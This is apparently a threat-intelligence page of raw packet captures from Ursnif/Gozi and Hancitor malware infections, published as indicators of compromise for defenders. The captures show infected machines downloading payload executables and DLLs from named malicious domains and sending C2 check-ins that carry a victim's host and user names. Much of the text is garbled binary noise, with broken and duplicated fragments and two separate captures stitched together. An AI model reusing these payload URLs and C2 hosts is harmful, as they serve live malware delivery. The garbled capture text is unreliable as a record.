Text Example

zzz.exe Delivers Uzrsnif Gozi Malware Banking Trojan PCAP File Download Traffic Sample GET /mozglue.dll

Latest indicators of compromise from our our Ursnif IOC feed. Ursnif (aka Gozi, aka IFSB) is a banking trojan targeting users in the USA and Europe. It’s was designed for the primary purpose of perpetrating fraud.

Fast, accurate identification of commodity malware like Ursnif allows SOC teams to focus efforts on hunting for more highly targeted and stealthy malware. By quickly blocking, de-prioritizing and filtering out the noise associated with mass distributed malware and crimeware, our Threat Intelligence Feed allows you to focus on the threats that matter to your organization.

2019-10-03 06:01:00.812050 IP 192.168.86.25.53425 > 104.27.161.249.80: Flags [P.], seq 3229838630:3229839201, ack 2872661083, win 16450, length 571: HTTP: GET /tmp/zzz.exe HTTP/1.1
E..cS.@….&..V.h……P..m&.9T[P.@B1<..GET /tmp/zzz.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=120970-
Unless-Modified-Since: Thu, 03 Oct 2019 02:07:13 GMT
If-Range: “1e1000-593f80b3c67d3”
Host: redmoscow.info
Connection: Keep-Alive
Cookie: __cfduid=df482dfbd65d8b46f1c87aacc388aec4a1570096931

2019-10-03 06:01:04.855775 IP 104.27.161.249.80 > 192.168.86.25.53425: Flags [P.], seq 1848473:1849587, ack 571, win 30, length 1114: HTTP
E ..+.@.7…h…..V..P…U….oaP…g……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….
2019-10-03 06:01:19.120810 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 2196019561:2196020046, ack 311058881, win 16514, length 485: HTTP: POST /223 HTTP/1.1
E…U.@…….V.h.K….P…i..a.P.@…..POST /223 HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: keitbeschutzen.com
Connection: Keep-Alive
Cache-Control: no-cache

–1BEF0A57BE110FD467A–

2019-10-03 06:01:19.279627 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 1:314, ack 485, win 233, length 313: HTTP: HTTP/1.1 200 OK
E .a./@.1…h.K…V..P….a….NP…….HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2019 10:02:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

5c
……….3.1.C. ..F..:…z…..M..].o……….c..WRQbmj`]RT.j.._..Zl.[Z..l.[l..5…R…
0

2019-10-03 06:01:19.284253 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 485:842, ack 314, win 16435, length 357: HTTP: GET /freebl3.dll HTTP/1.1
E…U.@…. ..V.h.K….P…N..b.P.@3q7..GET /freebl3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive
2019-10-03 06:01:20.010931 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 264538:265974, ack 842, win 242, length 1436: HTTP
E ….@.1…h.K…V..P….k…..P….^………… ……………B…….NIST-P521………………………………m………………………………………………………………………………… …~…).a|m~M=.L.Hw,………. ….c.X………………………………………………. …~…).a|m~M=.L.Hw,………. ….0……………….0…P…p……………….B… …….Curve25519…………………………………………………………Z.5..:…..Uv…e….S..;.<>’.Kk....,BG....c.@.w.}.-.3...9E....O.B........J|...+.3Wk1^...@h7.Q..............................c%Q......k....,BG....c.@.w.}.-.3...9E....O.B........J|...+.3Wk1^...@h7.Q...............<...\...|...........................B... ........................................................................................................1/..>.....k..-....n..A.....P..Z.V9.....*.....*...."...7..... .tn.;b....Y.A..T*8U..].U)l:T^8rv .6..J.&,o]......)....(..|..1..... …~..zC.|……………………….cM..7-.X…H..z…j..)s…..”…7….. .tn.;b….Y.A..T8U..].U)l:T^8rv .6..J.&,o]……)….(..|..1….. ...~..zC.|..._..………………………@…p……………b…0……………………………………………………………………………………………………………………………………..Q.>.a……!…@…r[………. .V.9Q.~.{.R..;…5s..=,4..E..kP?………………>.f#..B.d.9.?.!.(.kM=..K^w..Y(...'....3H...jB..~~1...f.... 2019-10-03 06:01:20.126700 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 330594:332030, ack 842, win 242, length 1436: HTTP E ....@.1...h.K...V..P....m"....P...N'..d.G.t7.....BH........v................0...0...U.#..0...Z..{* ...q...-.eu.X0…U………I……C.N.W9G…0…U………..0…U.%..0 ..+…….0w..U…p0n05.3.1./http://crl3.digicert.com/sha2-assured-cs-g1.crl05.3.1./http://crl4.digicert.com/sha2-assured-cs-g1.crl0L..U. .E0C07. .H...l..0*0(..+.........https://www.digicert.com/CPS0...g.....0....+........x0v0$..+.....0...http://ocsp.digicert.com0N..+.....0..Bhttp://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0...U.......0.0.. *.H.............CK.L .1"5.v.....=a. n.D<h.[....V.DV.4...YR....5........4D................Rl..!.W....\. :t[U........$..V{.q..K3@.-(>...A.....l.T|p....zXf...-.&.R.1Ln...j$..l.,....j.q.....AUuV.k..'.P...f..m..T....[n.H{...c..*..TS.....fB.}l…&……q.’
L………x.Gf…N.0…0………….8…5n..j…P0.. *.H……..0^1.0 ..U….US1.0…U.
..Symantec Corporation100…U…’Symantec Time Stamping Services CA – G20…121018000000Z..201229235959Z0b1.0 ..U….US1.0…U.
..Symantec Corporation1402..U…+Symantec Time Stamping Services Signer – G40..”0.. *.H………….0..
……c.9D..#.DI…..a
S…..,.J.n….K..c…2[.^.Z..(P…..a;EQ…V..G….f=G.pr…
…..d…%….”….z.w.[e…t.A…L….-.wD.h..tw..[2.V.3..c.I.:…3……….W.;…z”.$…p..N.&…..O….(r……….W0..S0…U…….0.0…U.%…..0
..+…….0…U………..0s..+……..g0e0*..+…..0…http://ts
2019-10-03 06:01:20.126720 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 334902:334952, ack 842, win 242, length 50: HTTP
E .Z..@.1…h.K…V..P….}…..P…e%..#j:…..9]…..’…..XC…#.#..+..9.,..I^.>….h..
2019-10-03 06:01:20.127904 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 842:1199, ack 334952, win 65047, length 357: HTTP: GET /mozglue.dll HTTP/1.1
E…Ur@…….V.h.K….P……~(P….b..GET /mozglue.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive
2019-10-03 06:01:20.253950 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 471372:472470, ack 1199, win 250, length 1098: HTTP
E .r.z@.1…h.K…V..P……….P…t2……7…1.0…..http://www.mozilla.com0.. *.H…………<“…q7.F..u.1….’ep......e....5N.-,..E…8…jK!…….. .yx.…R..bX:..v5…{.lh…5.u….~..~C……(.uxv..R3?r..&…VA..=c..m..$..Q. ……..?.4..q.oU.]…}..W[;..:..-..$../V ..w..9.2.ZoT.NO….[T….1..0T……?+…..m,%.5;..].j..e3/..]..). ..(c....Ls..….D.X.?….W…C…)…..Z.t..l…+…..(……….S..A.~uJ....-…..|…%.^.|.^]k.0.-J..fX0+………..2.R..y……..k.$….u.l|rC.p…….”………….6….O..’W+Z….%…4……<.R………0…. *.H…. .1…0……0r0^1.0 ..U….US1.0…U. ..Symantec Corporation100…U…’Symantec Time Stamping Services CA – G2…..8…5n..j…P0 ..+…….]0.. *.H…. .1.. *.H……0.. *.H…. .1…181114000811Z0#. *.H…. .1….$..b………..3=(.0.. *.H………… l. ……o…@y…c..TBT……pJ..g”&.AI.|./xO.G…k….”…….K.EX.I….7…..u…n…w|.X.}..L..#G….,3…B..K&.~..Y..W…..r9..fH.c..r.=.U[6H….F..S|.dC[}.5j…..s.4.b. Bv..N^H..9..r.w.v.u:….)…0.!..qu..[..E.Z….`.. M.E<.CjL.56…e_..h.5…. 2019-10-03 06:01:20.255368 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1199:1557, ack 472470, win 65338, length 358: HTTP: GET /msvcp140.dll HTTP/1.1
E…U.@…….V.h.K….P…….VP..:.O..GET /msvcp140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
ESCOC

..M…t…..d……….Y………E.P…….Y………E.P…….Y………E.P…….Y….q….E.P…….Y….]….E.P…….Y….I….E.P.y…..Y….5…..x…P.b…..Y……….h…P.K…..Y……….X…P.4…..Y………}..t>..t:.C.@
…YY……E…3.[].U……M.3.W.E…..E..E..A… Y..tM.u..u.P…………..t’…t….t…….u$Sj.j:..Sj.j…Sj.j…Sj.j..`………{d.[u.h…. 2, length 1112: HTTP ………….A………..A..E…………..A..E…………..A………….A…………..A……………….A .E…………..A ….V.K..M.W…}……s.3..u…..-QV.u..7……..u8.M….D..0.2Bj.X;.r.+.+.+.;..M.w..].;M.u$QVS……….t……..;….0.7G…r…….3..u…..^[..].U..SVW.}…t$.]..u.+.V..3P.u………..u…….u.3._^[]……U……M..E.SV…q.3..X.
2, length 1436: HTTP
..m………………………………………………………………………………… …~…).a|m~M=.L.Hw,………. ….c.X………………………………………………. …~…).a|m~M=.L.Hw,………. ….0…

……………………………………………………………………………………………Q.>.a……!…@…r[………. .V.9Q.~.{.R..;…5s..=,4..E..kP?………………>.f#..B.d.9.?.!.(.`kM=..K^w..Y(…’….3H…jB
2, length 1436: HTTP

ured-cs-g1.crl0L..U. .E0C07. `.H…l..0*0(..+………https://www.digicert.com/CPS0…g…..0….+……..x0v0$..+…..0…http://ocsp.digicert.com0N..+…..0..Bhttp://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0.

.zXf…-.&.R.1Ln…j$..l.,….j.q…..AUuV.k..’.P…f..m..T….[n.H{…c....TS…..fB.`}l…&……q.’

..US1.0…U.

=G.pr…_…..d…%….”….z.w.[e…t.A.*..L….-.wD.h..tw..[2.V.3..c.I.:…3……….W.;…z”.$…p..N.&…..O….(r……….W0..S0…U…….0.0…U.%…..0

2, length 50: HTTP

7, length 357: HTTP: GET /mozglue.dll HTTP/1.1

/*;q=0.1

2019-10-03 06:01:20.255368 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1199:1557, ack 472470, win 65338, length 358: HTTP: GET /msvcp140.dll HTTP/1.1
E…U.@…….V.h.K….P…….VP..:.O..GET /msvcp140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:20.626528 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 912210:912940, ack 1557, win 258, length 730: HTTP
E ….@.1…h.K…V..P….M….~P….R..0…U…
Washington1.0…U….Redmond1.0…U.
..Microsoft Corporation1&0$..U….Microsoft Time-Stamp PCA 2010..3….L….!|…….0.. .H.e.........20.. *.H.... .1...*.H.... ...0/. *.H.... .1". .a..T.Gv ...P.^......p.......=..0....*.H.... ...1..0..0..0....^/..q..2...^J;.N....0..0...~0|1.0 ..U....US1.0...U... Washington1.0...U....Redmond1.0...U. ..Microsoft Corporation1&0$..U....Microsoft Time-Stamp PCA 2010..3....L....!|.......0...........J.m0..:.5B..0.. *.H............VQ.l......Wl.$.......v..-&>r%..2..MB.+....mn..Iz...^.) . ...UT..xS#{..;u 2...]q..Y;u........_.gD.a@.&...... .*...F....U..W.-/..&y.X…E.p.K.u….Y..I3…Z….r…g…q…Ut..&…..XQ……r.JB#..1..E…..o…f…………=.%5..B.k..n..>…….D…5..w…3
2019-10-03 06:01:20.627701 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1557:1911, ack 912940, win 65338, length 354: HTTP: GET /nss3.dll HTTP/1.1
E…V#@…….V.h.K….P…~..O.P..:….GET /nss3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:21.378227 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2159388:2159452, ack 1911, win 267, length 64: HTTP
E .h..@.1…h.K…V..P….T…..P….{…….!FjJ.h5.Ej._……….6V.f..0….[?.D.@..#1…j……….. 2019-10-03 06:01:21.379453 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1911:2269, ack 2159452, win 65322, length 358: HTTP: GET /softokn3.dll HTTP/1.1 E…Wt@…….V.h.K….P……U.P..….GET /softokn3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:21.529860 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2304488:2304650, ack 2269, win 275, length 162: HTTP
E …{@.1..Ih.K…V..P………FP…….i.-}d…Z…`…….w&.{.c.d.+l…x.vx..R..r….]…k.9…9..1…K…..U…f.dz..%R…….h.^.t.,..u.%MK>.e……>…6…..K..)Z.Qjn*.L.m9..-………..=p.0./…
2019-10-03 06:01:21.530760 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 2269:2631, ack 2304650, win 65338, length 362: HTTP: GET /vcruntime140.dll HTTP/1.1
E…W.@…….V.h.K….P…F…JP..:5;..GET /vcruntime140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:21.660746 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2387938:2388783, ack 2631, win 283, length 845: HTTP
E .u..@.1..ch.K…V..P……….P…’I..nV…B…….T.4&…X!^&…..
…..t.BY^…h.o..#r;:u.a..H..k……WcG=…….$…?.1…0……0..0|1.0 ..U….US1.0…U…
Washington1.0…U….Redmond1.0…U.
..Microsoft Corporation1&0$..U….Microsoft Time-Stamp PCA 2010..3….C:….R…….0.. .H.e.........20.. *.H.... .1...*.H.... ...0/. *.H.... .1". ..inH....'.......H..^.j..#:k..G)0....*.H.... ...1..0..0..0..........Nn..u...Q.. m:0..0...~0|1.0 ..U....US1.0...U... Washington1.0...U....Redmond1.0...U. ..Microsoft Corporation1&0$..U....Microsoft Time-Stamp PCA 2010..3....C:....R.......0.......fc.r..).........0.. *.H..............U.$"...... E...V...E.k.}.N…^….)..;…g%…..l..L..9.}.)..1..&.v……k.N:r….SVx;..xv…i.p…..p..2z..:..Qk_..v..l..b…K……j..}..Z..r.O}..-.{@…..$K….M.?h….%.t…..j.v…cK…….r.Yf.fZ”e.e.G…..x….k4.1..hfK.3……./(………..&bJ
2019-10-03 06:01:21.989504 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2387938:2388783, ack 2631, win 283, length 845: HTTP
E .u..@.1..bh.K…V..P……….P…’I..nV…B…….T.4&…X!^&…..
…..t.BY^…h.o..#r;:u.a..H..k……WcG=…….$…?.1…0……0..0|1.0 ..U….US1.0…U…
Washington1.0…U….Redmond1.0…U.

Hancitor Amadey Pony Malware Trojan Downloader Cobalt-Strike PCAP Download Traffic Sample todratsake.ru 31.44.184.33

2019-07-25 13:00:40.697356 IP 10.7.25.101.54392 > 10.7.25.1.53: 3214+ A? codeotso.com. (30)
E..:.f……
..e
….x.5.&E…………..codeotso.com…..
2019-07-25 13:00:40.963731 IP 10.7.25.1.53 > 10.7.25.101.54392: 3214 1/0/0 A 83.220.175.185 (46)
E..J6…….

..e.5.x.6……………codeotso.com……………..S…
2019-07-25 13:00:40.988041 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [S], seq 1865439027, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.g@….[
..eS……Po0W3…… ..T…………..
2019-07-25 13:00:41.166747 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [S.], seq 1917710723, ack 1865439028, win 64240, options [mss 1460], length 0
E..,6……CS…
..e.P..rM..o0W4`………..
2019-07-25 13:00:41.167101 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [.], ack 1, win 64240, length 0
E..(.i@….e
..eS……Po0W4rM..P….T..
2019-07-25 13:00:41.167225 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [P.], seq 1:231, ack 1, win 64240, length 230: HTTP: POST /f5lkB/index.php HTTP/1.1
E….j@….~
..eS……Po0W4rM..P…….POST /f5lkB/index.php HTTP/1.1
Host: codeotso.com
Accept: /
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

id=3967861396&sd=fdf0b4&vs=1.41&ar=0&bi=1&lv=0&os=9&av=0&pc=HIDDENROAD-PC&un=richy.richardson&
2019-07-25 13:00:41.167370 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [.], ack 231, win 64240, length 0
E..(6……FS…
..e.P..rM..o0X.P….n..
2019-07-25 13:00:41.371519 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [P.], seq 1:257, ack 231, win 64240, length 256: HTTP: HTTP/1.1 200 OK
E..(6……ES…
..e.P..rM..o0X.P….x..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Thu, 25 Jul 2019 17:00:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45

40
1000094001http://material-nerud.ru/wp-includes/pomo/p.exe#
0
2019-07-25 13:00:41.699548 IP 10.7.25.1.53 > 10.7.25.101.51988: 29514 1/0/0 A 77.120.115.221 (48)
E..L6…….

..e.5…8..sJ………..fordifortti.ru……………..Mxs.
2019-07-25 13:00:41.701189 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [S], seq 1365560241, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.p@…..
..eMxs….PQd…….. ……………..
2019-07-25 13:00:41.795556 IP 10.7.25.1.53 > 10.7.25.101.54927: 19539 1/0/0 A 92.53.96.153 (51)
E..O6…….

..e.5…;..LS………..material-nerud.ru……………..\5. 2019-07-25 13:00:41.879144 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [S.], seq 172257877, ack 1365560242, win 64240, options [mss 1460], length 0 E..,6......}Mxs. ..e.P.. DrUQd..…^.…..
2019-07-25 13:00:41.879331 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [.], ack 1, win 64240, length 0
E..(.q@…..
..eMxs….PQd..
DrVP…v…
2019-07-25 13:00:41.879428 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [P.], seq 1:233, ack 1, win 64240, length 232: HTTP: POST /f5lkB/index.php HTTP/1.1
E….r@…..
..eMxs….PQd..
DrVP…….POST /f5lkB/index.php HTTP/1.1
Host: fordifortti.ru
Accept: /
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

id=3967861396&sd=fdf0b4&vs=1.41&ar=0&bi=1&lv=0&os=9&av=0&pc=HIDDENROAD-PC&un=richy.richardson&
2019-07-25 13:00:41.879503 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [.], ack 233, win 64240, length 0
E..(6…….Mxs.
..e.P..
DrVQd..P…u1..
2019-07-25 13:00:41.943752 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [S], seq 3529323204, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.s@…..
..e\5....P.]2....... ..[.............. 2019-07-25 13:00:42.103552 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [S.], seq 2378334524, ack 3529323205, win 64240, options [mss 1460], length 0 E..,6.....$.\5.
..e.P…..<.]2.....p...... 2019-07-25 13:00:42.103869 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [.], ack 1, win 64240, length 0 E..(.t@...." ..e\5….P.]2….=P……. 2019-07-25 13:00:42.104328 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [P.], seq 1:327, ack 1, win 64240, length 326: HTTP: GET /wp-includes/pomo/p.exe HTTP/1.1
E..n.u@…..
..e\5....P.]2....=P...7...GET /wp-includes/pomo/p.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: material-nerud.ru Connection: Keep-Alive 2019-07-25 13:00:42.104328 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [P.], seq 1:327, ack 1, win 64240, length 326: HTTP: GET /wp-includes/pomo/p.exe HTTP/1.1 E..n.u@..... ..e\5….P.]2….=P…7…GET /wp-includes/pomo/p.exe HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: material-nerud.ru
Connection: Keep-Alive

2019-07-25 13:00:42.104455 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [.], ack 327, win 64240, length 0
E..(6…..$.\5`.
..e.P…..=.]4.P…….
2019-07-25 13:00:42.113973 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [P.], seq 1:198, ack 233, win 64240, length 197: HTTP: HTTP/1.1 200 OK
E…6…….Mxs.
..e.P..
DrVQd..P… C..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Thu, 25 Jul 2019 17:00:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45

6

0

2019-07-25 13:00:42.114334 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [F.], seq 233, ack 198, win 64043, length 0
E..(.v@…..
..eMxs….PQd..
Ds.P..+u0..
2019-07-25 13:00:42.114462 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [.], ack 234, win 64239, length 0
E..(6……|Mxs.
..e.P..
Ds.Qd..P…tl..
2019-07-25 13:00:42.275225 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [P.], seq 1:1347, ack 327, win 64240, length 1346: HTTP: HTTP/1.1 200 OK
E..j6…….\5`.
..e.P…..=.]4.P…….HTTP/1.1 200 OK
Server: nginx
Date: Thu, 25 Jul 2019 17:00:35 GMT
Content-Type: application/octet-stream
Content-Length: 300032
Last-Modified: Thu, 25 Jul 2019 14:50:21 GMT
Connection: keep-alive
ETag: “5d39c1ad-49400”
Expires: Sun, 25 Aug 2019 17:00:35 GMT
Cache-Control: max-age=2678400
Accept-Ranges: bytes

2019-07-25 13:05:46.182168 IP 10.7.25.101.49179 > 94.124.9.53.80: Flags [P.], seq 1:342, ack 1, win 64240, length 341: HTTP: GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
E..}..@…l.
..e^| 5…P.o..6.i.P…….GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: dobresmaki.eu
Connection: Keep-Alive

2019-07-25 13:05:46.182269 IP 94.124.9.53.80 > 10.7.25.101.49179: Flags [.], ack 342, win 64240, length 0
E..(8$….w.^| 5
..e.P..6.i..o..P…8…
2019-07-25 13:05:46.184001 IP 94.124.9.53.80 > 10.7.25.101.49180: Flags [S.], seq 2287068635, ack 1286805230, win 64240, options [mss 1460], length 0
E..,8%….w.^| 5
..e.P…Q..L…`………..
2019-07-25 13:05:46.184189 IP 10.7.25.101.49180 > 94.124.9.53.80: Flags [.], ack 1, win 64240, length 0
E..(..@…n(
..e^| 5…PL….Q..P…….
2019-07-25 13:05:46.184358 IP 10.7.25.101.49180 > 94.124.9.53.80: Flags [P.], seq 1:342, ack 1, win 64240, length 341: HTTP: GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
E..}..@…l.
..e^| 5…PL….Q..P…….GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: dobresmaki.eu
Connection: Keep-Alive

2019-07-25 13:05:46.184449 IP 94.124.9.53.80 > 10.7.25.101.49180: Flags [.], ack 342, win 64240, length 0
E..(8&….w.^| 5
..e.P…Q..L..CP….5..
2019-07-25 13:05:46.211149 IP 83.220.175.185.80 > 10.7.25.101.49178: Flags [FP.], seq 198, ack 232, win 64239, length 0
E..(8’……S…
..e.P….p..Y.RP…….
2019-07-25 13:05:46.211404 IP 10.7.25.101.49178 > 83.220.175.185.80: Flags [.], ack 199, win 64043, length 0
E..(..@….A
..eS……P.Y.R..p.P..+….
2019-07-25 13:05:46.346765 IP 94.124.9.53.80 > 10.7.25.101.49179: Flags [P.], seq 1:1347, ack 342, win 64240, length 1346: HTTP: HTTP/1.1 200 OK
E..j8(….rI^| 5
..e.P..6.i..o..P…….HTTP/1.1 200 OK
Date: Thu, 25 Jul 2019 17:05:39 GMT
Server: Apache
Last-Modified: Tue, 23 Jul 2019 10:59:38 GMT
Accept-Ranges: bytes
Content-Length: 110592
Connection: close
Content-Type: application/x-msdownload

2019-07-25 13:05:46.540594 IP 10.7.25.101.49182 > 77.120.115.221.80: Flags [P.], seq 1:152, ack 1, win 64240, length 151: HTTP: POST /f5lkB/index.php HTTP/1.1
E…..@…..
..eMxs….P..7.`.?-P…b9..POST /f5lkB/index.php HTTP/1.1
Host: todratsake.ru
Accept: /
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

e0=1000101001&
2019-07-25 13:05:46.540724 IP 77.120.115.221.80 > 10.7.25.101.49182: Flags [.], ack 152, win 64240, length 0
E..(86……Mxs.
..e.P..`.?-..8.P….V..
2019-07-25 13:05:47.588118 IP 10.7.25.101.49184 > 31.44.184.33.80: Flags [P.], seq 1:201, ack 1, win 64240, length 200: HTTP: GET /H7mp HTTP/1.1
E…..@….{
..e.,.!. .P[^b0.#.jP…+…GET /H7mp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3; .NET CLR 2.0.50727)
Host: 31.44.184.33
Connection: Keep-Alive
Cache-Control: no-cache

2019-07-25 13:05:47.588274 IP 31.44.184.33.80 > 10.7.25.101.49184: Flags [.], ack 201, win 64240, length 0
E..(8……..,.!
..e.P. .#.j[^b.P…s…
2019-07-25 13:05:47.646083 IP 83.220.175.185.80 > 10.7.25.101.49185: Flags [S.], seq 1514318061, ack 732422481, win 64240, options [mss 1460], length 0
E..,8……;S…
..e.P.!ZB..+..Q`………..
2019-07-25 13:05:47.646247 IP 10.7.25.101.49185 > 83.220.175.185.80: Flags [.], ack 1, win 64240, length 0
E..(..@…..
..eS….!.P+..QZB..P….F..
